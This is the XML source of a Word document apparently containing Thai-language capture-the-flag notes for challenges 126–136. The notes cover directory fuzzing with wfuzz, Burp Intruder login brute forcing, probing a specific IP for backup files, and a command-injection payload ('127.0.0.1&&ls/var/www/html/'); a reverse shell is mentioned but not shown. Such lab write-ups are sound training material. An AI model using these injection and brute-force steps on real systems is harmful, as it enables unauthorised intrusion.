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F571C2D">
      <w:r w:rsidR="6F96DEA5">
        <w:rPr/>
        <w:t>126</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6F96DEA5" w:rsidRDefault="6F96DEA5" w14:paraId="2EFC5F17" w14:noSpellErr="1" w14:textId="497989C2">
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>ให้</w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t xml:space="preserve"> curl </w:t>
      </w:r>
      <w:hyperlink r:id="R044318e271b44731">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="4BBC2508">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://target-ip/robots.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4BBC2508" w:rsidRDefault="4BBC2508" w14:paraId="1BF092DD" w14:textId="65EAE720">
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>จะเจอ</w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t xml:space="preserve"> path </w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>แล้วก็</w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>เอา</w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t xml:space="preserve"> path </w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>ไป</w:t>
      </w:r>
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t xml:space="preserve"> search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBC2508" w:rsidRDefault="4BBC2508" w14:paraId="173759B8" w14:textId="642862A4">
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>--------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4BBC2508" w:rsidRDefault="4BBC2508" w14:paraId="3A2E6B00" w14:textId="1CB7DD46">
      <w:r w:rsidR="4BBC2508">
        <w:rPr/>
        <w:t>127</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3EF353" w:rsidP="3D2D5E19" w:rsidRDefault="1B3EF353" w14:paraId="73E34E2C" w14:textId="6C0F12CC">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="1B3EF353">
        <w:rPr/>
        <w:t>ใช้</w:t>
      </w:r>
      <w:r w:rsidR="1B3EF353">
        <w:rPr/>
        <w:t xml:space="preserve"> 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wfuzz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-c -w /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usr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/share/wordlists/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dirb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/common.txt --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hc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404 </w:t>
      </w:r>
      <w:hyperlink r:id="Rfbad7843af6d4867">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="1B3EF35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http://target-ip/FUZZ</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1B3EF353" w:rsidP="3D2D5E19" w:rsidRDefault="1B3EF353" w14:paraId="1B553E4F" w14:textId="0F6049D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ก็จะเจอ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dev directory </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3EF353" w:rsidP="3D2D5E19" w:rsidRDefault="1B3EF353" w14:paraId="25A1AD9B" w14:textId="3DAF99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----------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3EF353" w:rsidP="3D2D5E19" w:rsidRDefault="1B3EF353" w14:paraId="29ADD970" w14:textId="2992703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128</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B3EF353" w:rsidP="3D2D5E19" w:rsidRDefault="1B3EF353" w14:paraId="15A41C0E" w14:textId="6B97722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>ใช้</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="1B3EF3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burp brute force login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>ส่งไปที่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Send to Intruder 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>แล้ว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>ก็เอาwordlist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>ไปใส่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20580276">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>แล้วดูอันที่มีความย</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="56E9D5BA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>าวต่างจากเพื่อน</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="56E9D5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อันนี้นคือรหัสจริง</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="56E9D5BA" w:rsidP="3D2D5E19" w:rsidRDefault="56E9D5BA" w14:paraId="2F85686E" w14:textId="0567DDA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56E9D5BA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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="56E9D5BA" w:rsidP="3D2D5E19" w:rsidRDefault="56E9D5BA" w14:paraId="760683AF" w14:textId="7DE9D8E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56E9D5BA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11295820" w:rsidP="3D2D5E19" w:rsidRDefault="11295820" w14:paraId="7E05DE10" w14:textId="057BE49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11295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F12 </w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="11295820">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>แล้วดู</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="11295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login.js </w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="11295820">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>จะเห็น</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="11295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password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11295820" w:rsidP="3D2D5E19" w:rsidRDefault="11295820" w14:paraId="3A41BA0D" w14:textId="241BB9C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11295820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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11295820" w:rsidP="3D2D5E19" w:rsidRDefault="11295820" w14:paraId="6D92FFFC" w14:textId="4CB50A7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11295820">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>130</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2D4CDA09" w:rsidP="3D2D5E19" w:rsidRDefault="2D4CDA09" w14:paraId="3992895B" w14:textId="648E8CF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>มันบอกว่า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Browser Autocomplete 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>pasword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>ให้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>แต่ของผมไม่ขึ้น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>แต่คิดว่าถ้าขึ้นแต่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f12 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>ไปเ</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="406960F7">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ปลียน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 pas</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="4A1DDA3A">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sw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 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>ให้เป็น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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1C3883F3" w:rsidP="3D2D5E19" w:rsidRDefault="1C3883F3" w14:paraId="0BA05796" w14:textId="4DB163F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>ผมไปเจอ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>js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>ไฟล์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>ที่บอก</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="1C3883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flag</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2D4CD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49758B9" w:rsidP="3D2D5E19" w:rsidRDefault="649758B9" w14:paraId="13EE5016" w14:textId="2250F96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649758B9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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="649758B9" w:rsidP="3D2D5E19" w:rsidRDefault="649758B9" w14:paraId="2392EBE7" w14:textId="07AC706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649758B9">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>131</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FDA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="23CA9086" w14:textId="20EB84F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>จากโจทย์บอกมันอยู่ใน</w:t>
      </w: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index ก็สุ่มเอาเลย</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FDA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="1A766118" w14:textId="2804CAE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>ใช้</w:t>
      </w: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 </w:t>
      </w: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>ที่โจทย์กำหนดก็ได้</w:t>
      </w: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>แต่ต้องไปเพิ่ม</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="4FEC8C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4FEC8C33">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="4FEC8C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4FEC8C33">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>เพราะ</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="4FEC8C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มันอยู่บนนั้น</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="0B485F35" w14:textId="7E8BA0B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DA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="65B12D6F" w14:textId="7C9098B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>┌──(ap㉿kali)-[~/ohmybackup]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FDA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="5CFBB518" w14:textId="177E3A06">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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>└─$ for ext in bak old tmp swp~ .swp backup orig; do</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FDA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="69FBB3A0" w14:textId="25E23991">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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echo -n "index.php.$ext : "</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7FDA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="267BB26B" w14:textId="3D2AFA78">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pP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curl -o /dev/null -s -w "%{http_code}\n" </w:t>
      </w:r>
      <w:hyperlink r:id="Re1352a56842f440e">
        <w:r w:rsidRPr="3D2D5E19" w:rsidR="7FDA5C14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http://34.142.139.230/index.php.$ext</w:t>
        </w:r>
      </w:hyperlink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DA5C14" w:rsidP="3D2D5E19" w:rsidRDefault="7FDA5C14" w14:paraId="793C2EFE" w14:textId="17006462">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="7FDA5C14">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6863A39D" w:rsidP="3D2D5E19" w:rsidRDefault="6863A39D" w14:paraId="0BC1726C" w14:textId="4F1C02D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6863A39D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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6863A39D" w:rsidP="3D2D5E19" w:rsidRDefault="6863A39D" w14:paraId="790DE7CC" w14:textId="3D98BB2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6863A39D">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>132</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2B88BEE6" w:rsidP="3D2D5E19" w:rsidRDefault="2B88BEE6" w14:paraId="6D6C62DE" w14:textId="496A707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2B88BEE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D2D5E19" w:rsidR="2B88BEE6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2B88BEE6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.swp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2257F997" w:rsidP="3D2D5E19" w:rsidRDefault="2257F997" w14:paraId="0F41A549" w14:textId="2106C62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2257F997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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2257F997" w:rsidP="3D2D5E19" w:rsidRDefault="2257F997" w14:paraId="6826CE3B" w14:textId="39DE684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2257F997">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>133</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2257F997" w:rsidP="3D2D5E19" w:rsidRDefault="2257F997" w14:paraId="338D7CA8" w14:textId="0212E8F0">
      <w:pPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2257F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127.0.0.1&amp;&amp;ls/var/www/html/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2257F997" w:rsidP="3D2D5E19" w:rsidRDefault="2257F997" w14:paraId="18657F11" w14:textId="7214B3D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2257F997">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ก็เจอไฟล์</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2257F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flag </w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2257F997">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ละก็</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="2257F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 ไฟล์เอา</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2257F997" w:rsidP="3D2D5E19" w:rsidRDefault="2257F997" w14:paraId="6EFBDFA7" w14:textId="4F2E111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2257F997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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="31943689" w:rsidP="3D2D5E19" w:rsidRDefault="31943689" w14:paraId="77F4C312" w14:textId="05FE0277">
      <w:p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2D5E19" w:rsidR="31943689">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>134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>ทำไม่ได้เพราะ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>มัน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>ต้องใช้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 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>ip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>เพื่อทำ</w:t>
      </w:r>
      <w:r w:rsidRPr="3D2D5E19" w:rsidR="5AE50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2D5E19" w:rsidR="5AE502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Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A37E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="49B8E04B" w14:textId="109CD277">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:drawing>
          <wp:inline wp14:editId="49704579" wp14:anchorId="7939D481">
            <wp:extent cx="4877223" cy="5425910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="217058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058200" name="Picture 217058200"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1473261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7E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="50BAE413" w14:textId="6E381B85">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:drawing>
          <wp:inline wp14:editId="659B859C" wp14:anchorId="6F82772D">
            <wp:extent cx="4701947" cy="3673158"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="374720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720380" name="Picture 374720380"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2080927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7E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="4C722BEF" w14:textId="0694A529">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:drawing>
          <wp:inline wp14:editId="58EDCBC1" wp14:anchorId="3229C5D6">
            <wp:extent cx="4656223" cy="4892464"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1774392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392419" name="Picture 1774392419"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId319408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7E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="6D4CE2B6" w14:textId="2C1175A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:drawing>
          <wp:inline wp14:editId="4A55E297" wp14:anchorId="3586388C">
            <wp:extent cx="4694327" cy="4740051"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="546284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284432" name="Picture 546284432"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId307142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7E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="317909DC" w14:textId="77839CFD">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:rPr/>
        <w:t>-------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A37E45E" w:rsidP="3D2D5E19" w:rsidRDefault="0A37E45E" w14:paraId="3701E107" w14:textId="7E74149C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A37E45E">
        <w:rPr/>
        <w:t>135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1CB2A0E6" w:rsidP="3D2D5E19" w:rsidRDefault="1CB2A0E6" w14:paraId="5D96AD17" w14:textId="52B97FBF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CB2A0E6">
        <w:drawing>
          <wp:inline wp14:editId="489FA2BB" wp14:anchorId="0F626DDD">
            <wp:extent cx="4747672" cy="5380186"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="802116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116742" name="Picture 802116742"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1704428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2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B2A0E6">
        <w:rPr/>
        <w:t>ฃ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="5950F6F3" w14:textId="51BB54AE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1CB2A0E6" w:rsidP="3D2D5E19" w:rsidRDefault="1CB2A0E6" w14:paraId="2AA8A42F" w14:textId="6A34A19A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CB2A0E6">
        <w:drawing>
          <wp:inline wp14:editId="220CF0E1" wp14:anchorId="59E76D64">
            <wp:extent cx="4610500" cy="3635055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2104136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136587" name="Picture 2104136587"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId707918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2A0E6" w:rsidP="3D2D5E19" w:rsidRDefault="1CB2A0E6" w14:paraId="330ECC55" w14:textId="4EF2B362">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CB2A0E6">
        <w:drawing>
          <wp:inline wp14:editId="50918711" wp14:anchorId="07531F71">
            <wp:extent cx="4595258" cy="4115157"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="659962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962186" name="Picture 659962186"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1445554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2A0E6" w:rsidP="3D2D5E19" w:rsidRDefault="1CB2A0E6" w14:paraId="3BF1EAEE" w14:textId="40FCB904">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CB2A0E6">
        <w:drawing>
          <wp:inline wp14:editId="498C9F76" wp14:anchorId="5D9D82B6">
            <wp:extent cx="4854361" cy="3703641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1869263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263719" name="Picture 1869263719"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1039133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CD12C" w:rsidP="3D2D5E19" w:rsidRDefault="25DCD12C" w14:paraId="5E9E0511" w14:textId="0B1BDC3C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="25DCD12C">
        <w:drawing>
          <wp:inline wp14:editId="442C0AAD" wp14:anchorId="143FD3EC">
            <wp:extent cx="4778154" cy="5395428"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="931649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649722" name="Picture 931649722"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId883468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CD12C" w:rsidP="3D2D5E19" w:rsidRDefault="25DCD12C" w14:paraId="7DED19BA" w14:textId="6B7F1A4E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="25DCD12C">
        <w:drawing>
          <wp:inline wp14:editId="1BE00CCE" wp14:anchorId="0607A087">
            <wp:extent cx="4747672" cy="4968670"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2144299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299080" name="Picture 2144299080"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1999780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2" cy="49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CD12C" w:rsidP="3D2D5E19" w:rsidRDefault="25DCD12C" w14:paraId="03C0E96E" w14:textId="129022C5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="25DCD12C">
        <w:drawing>
          <wp:inline wp14:editId="7BA1D5F1" wp14:anchorId="18541B38">
            <wp:extent cx="4877223" cy="5464013"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="617653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653225" name="Picture 617653225"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1221241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439EA" w:rsidP="3D2D5E19" w:rsidRDefault="282439EA" w14:paraId="5987D6B3" w14:textId="784D7DE8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="282439EA">
        <w:rPr/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B387C21" w:rsidP="3D2D5E19" w:rsidRDefault="1B387C21" w14:paraId="052FA0CB" w14:textId="33C791E2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1B387C21">
        <w:rPr/>
        <w:t>136</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="1B387C21">
        <w:rPr/>
        <w:t>ทำเหมือน  135</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1B387C21" w:rsidP="3D2D5E19" w:rsidRDefault="1B387C21" w14:paraId="49384CEF" w14:textId="01E86827">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1B387C21">
        <w:rPr/>
        <w:t>-----------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="421CD9D5" w14:textId="5B4EFBFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="7A45398D" w14:textId="44C3DFCE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="4073FE39" w14:textId="48C0C36F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="0ED7FF4D" w14:textId="626C10BC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="3D2D5E19" w:rsidP="3D2D5E19" w:rsidRDefault="3D2D5E19" w14:paraId="2CE13817" w14:textId="662894C6">
